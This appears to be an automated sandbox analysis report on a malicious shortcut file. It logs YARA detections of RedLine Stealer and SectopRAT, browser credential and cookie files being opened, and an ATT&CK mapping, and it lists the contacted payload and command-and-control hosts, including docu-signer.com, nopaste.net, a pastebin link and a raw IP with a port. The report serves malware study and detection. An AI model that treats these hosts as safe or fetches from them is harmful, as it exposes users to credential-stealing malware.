Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.1869837031.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1950892133.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1700128947.0000000005BA4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1869173897.0000000005C34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1945564458.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1699884150.0000000005E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1946324487.0000000005B04000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1705438253.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1872119594.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1868490019.0000000005F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5960, type: MEMORYSTR

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5204, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Source: AutoIt3.exe	Binary or memory string: WIN_81
Source: AutoIt3.exe	Binary or memory string: WIN_XP
Source: AutoIt3.exe	Binary or memory string: WIN_XPe
Source: AutoIt3.exe	Binary or memory string: WIN_VISTA
Source: AutoIt3.exe	Binary or memory string: WIN_7
Source: AutoIt3.exe	Binary or memory string: WIN_8
Source: AutoIt3.exe, 00000021.00000003.1944653433.0000000005BB6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.AutoIt3.exe.5dc5d6c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.1869837031.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1950892133.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1700128947.0000000005BA4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1869173897.0000000005C34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1945564458.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1699884150.0000000005E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1946324487.0000000005B04000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1705438253.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1872119594.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1868490019.0000000005F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5960, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.AutoIt3.exe.4d26e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.updater.exe.4c96e70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.AutoIt3.exe.4bf6e70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.1869837031.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1950892133.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1700128947.0000000005BA4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1869173897.0000000005C34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1945564458.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1699884150.0000000005E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.1946324487.0000000005B04000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1705438253.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1872119594.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1868490019.0000000005F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 5960, type: MEMORYSTR

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5204, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C2696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	27_2_00C2696E
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Code function: 27_2_00C26E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	27_2_00C26E32
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003B696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	29_2_003B696E
Source: C:\faggbgb\AutoIt3.exe	Code function: 29_2_003B6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	29_2_003B6E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Create Account	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	1 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	169 System Information Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	11 Masquerading	LSA Secrets	261 Security Software Discovery	SSH	3 Clipboard Data	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	251 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
fsg5PWtTm2.lnk	34%	Virustotal		Browse
fsg5PWtTm2.lnk	34%	ReversingLabs	Shortcut.Trojan.Pantera
fsg5PWtTm2.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\27589682\updater.exe	3%	ReversingLabs
C:\faggbgb\AutoIt3.exe	3%	ReversingLabs

Source	Detection	Scanner	Label
https://docu-signer.com/api/uz/09125X	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp474	0%	Avira URL Cloud	safe
https://nopaste.net	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4gshtkwn	0%	Avira URL Cloud	safe
https://nopaste.net/SFHgtxFGtB	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/X	0%	Avira URL Cloud	safe
https://docu-signer.X	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/09X	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/091X	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/091254516X	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/loX	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4https://docu-signer.com/api/uz/0912545164/index.m	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4LMEMh	0%	Avira URL Cloud	safe
https://docu-signer.coX	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s	0%	Avira URL Cloud	safe
http://185.147.124.236:9000t-	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/09125451X	0%	Avira URL Cloud	safe
http://docu-signer.com	0%	Avira URL Cloud	safe
https://docu-signer.com	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4indows	0%	Avira URL Cloud	safe
https://docu-signer.com/apiX	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4DriverData=C:	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/upX	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4p	0%	Avira URL Cloud	safe
https://docu-signer.com/	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/log4cX	0%	Avira URL Cloud	safe
https://google.c	0%	Avira URL Cloud	safe
https://docu-signer.comX	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4O	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/updaX	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/log4cxx.dllX	0%	Avira URL Cloud	safe
https://www.google.com(	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4a	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4/	0%	Avira URL Cloud	safe
https://www.irs.	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4;7	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4l	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4j	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4c	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/log4cxx.X	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4.	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/log4cxX	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4C:	0%	Avira URL Cloud	safe
https://docu-signer.com/X	0%	Avira URL Cloud	safe
https://docu-signer.com/api/uz/0912545164/index.mp4=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
google.com	172.217.17.46	true	false	high
nopaste.net	174.138.125.138	true	true	unknown
docu-signer.com	104.21.87.65	true	true	unknown
www.google.com	142.250.181.100	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
x1.i.lencr.org	unknown	unknown	false	high
www.irs.gov	unknown	unknown	false	high
time.windows.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://nopaste.net/SFHgtxFGtB	true	Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPTHhLsGIjArISC-HyJoTc3_sjeSAiJbpKJK0RvOcYgC0U9H7A2KwdkD7gUg85CuTxsF4j_hDoEyBj5qY25kcloBQw	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJ3IhLsGIjBeq4R7hduOCFk6MqmpybyFegkVqEIli4aSEr98237Hfu-HLjsSgltSEthFM-9uyK8yBj5qY25kcloBQw	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJXIhLsGIjDLabiJ-QiwsZEXYTtbpyHougaNin6iQvUlvUHrndvdIUDrbCCQ_csi8ctFk-RARRoyBj5qY25kcloBQw	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLbIhLsGIjCxuDqUvtsLwShhV2mnWCZcd15X9Bz8fRSDQoVfsjclHpKi3pgk0bE0WrMTTNOo_TQyBj5qY25kcloBQw	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GL7IhLsGIjBA4Oq5LSboi3-Pl7bxdS0P0UbEVBVKyWh0K18E4kMMNYX0Ny8CZYGtXqSojKHMKMkyBj5qY25kcloBQw	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GK7IhLsGIjCvxkyCiJUVF_Bzf-MafVcDRQeW2hNqrhgSEQJ_B_v93rf27hWy_7yle_F6BT2ZonUyBj5qY25kcloBQw	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GOvHhLsGIjALg1n_oD6-x5qoLjA7snmDOgpvd0YRP2UlQi1KpcsQa-jQLLaErxKo0CQKvZXI6zcyBj5qY25kcloBQw	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GIzIhLsGIjB3f8ZlXwQ9EDNrSunHscCKBtjTBi04vtVAdXQzDTijOe7a5EnVZtF_3mYyMP0B8vkyBj5qY25kcloBQw	false		high
https://google.com/a/cpanel/index.js	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://docu-signer.com/api/uz/0912545164/index.mp474	mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/09125X	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/09X	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.X	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/X	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nopaste.net	powershell.exe, 00000010.00000002.2565392713.0000026A1FB99000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/index.mp4gshtkwn	mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3De0ca2cab5d4c45d9:TM%	powershell.exe, 0000000E.00000002.2467331663.000001CA9D0D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.irs.gov/pub/irs-pdf/i1040g	powershell.exe, 0000000E.00000002.2467331663.000001CA9E121000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/091254516X	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/091X	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s	ssh.exe, 00000006.00000002.2549945050.000001C0F70D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe	true	Avira URL Cloud: safe	unknown
https://google.com/a/cpanel/index.js&q=EgQILnu9GJ3IhLsGIjBeq4R7hduOCFk6MqmpybyFegkVqEIli4aSEr98237Hf	powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GL7IhLsGI	powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D309000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLbIhLsGI	powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google.com/a/cpanel/index.js&q=EgQILnu9GOvHhLsGIjALg1n_oD6-x5qoLjA7snmDOgpvd0YRP2UlQi1KpcsQa	powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google.com/a/cpanel/index.js&q=EgQILnu9GIzIhLsGIjB3f8ZlXwQ9EDNrSunHscCKBtjTBi04vtVAdXQzDTijO	powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/index.mp4https://docu-signer.com/api/uz/0912545164/index.m	mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.2516521240.000001CAACA54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2674622656.0000026A2F9E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.coX	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/a/index.jsp	powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/nGmga9WQPO	MSBuild.exe, 0000001E.00000002.1871655596.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.irs.gov	powershell.exe, 0000000E.00000002.2467331663.000001CA9CC0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9E8B0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.147.124.236:9000t-	MSBuild.exe, 0000001C.00000002.2564549704.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docu-signer.com	powershell.exe, 00000010.00000002.2565392713.0000026A2107F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A20DBE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
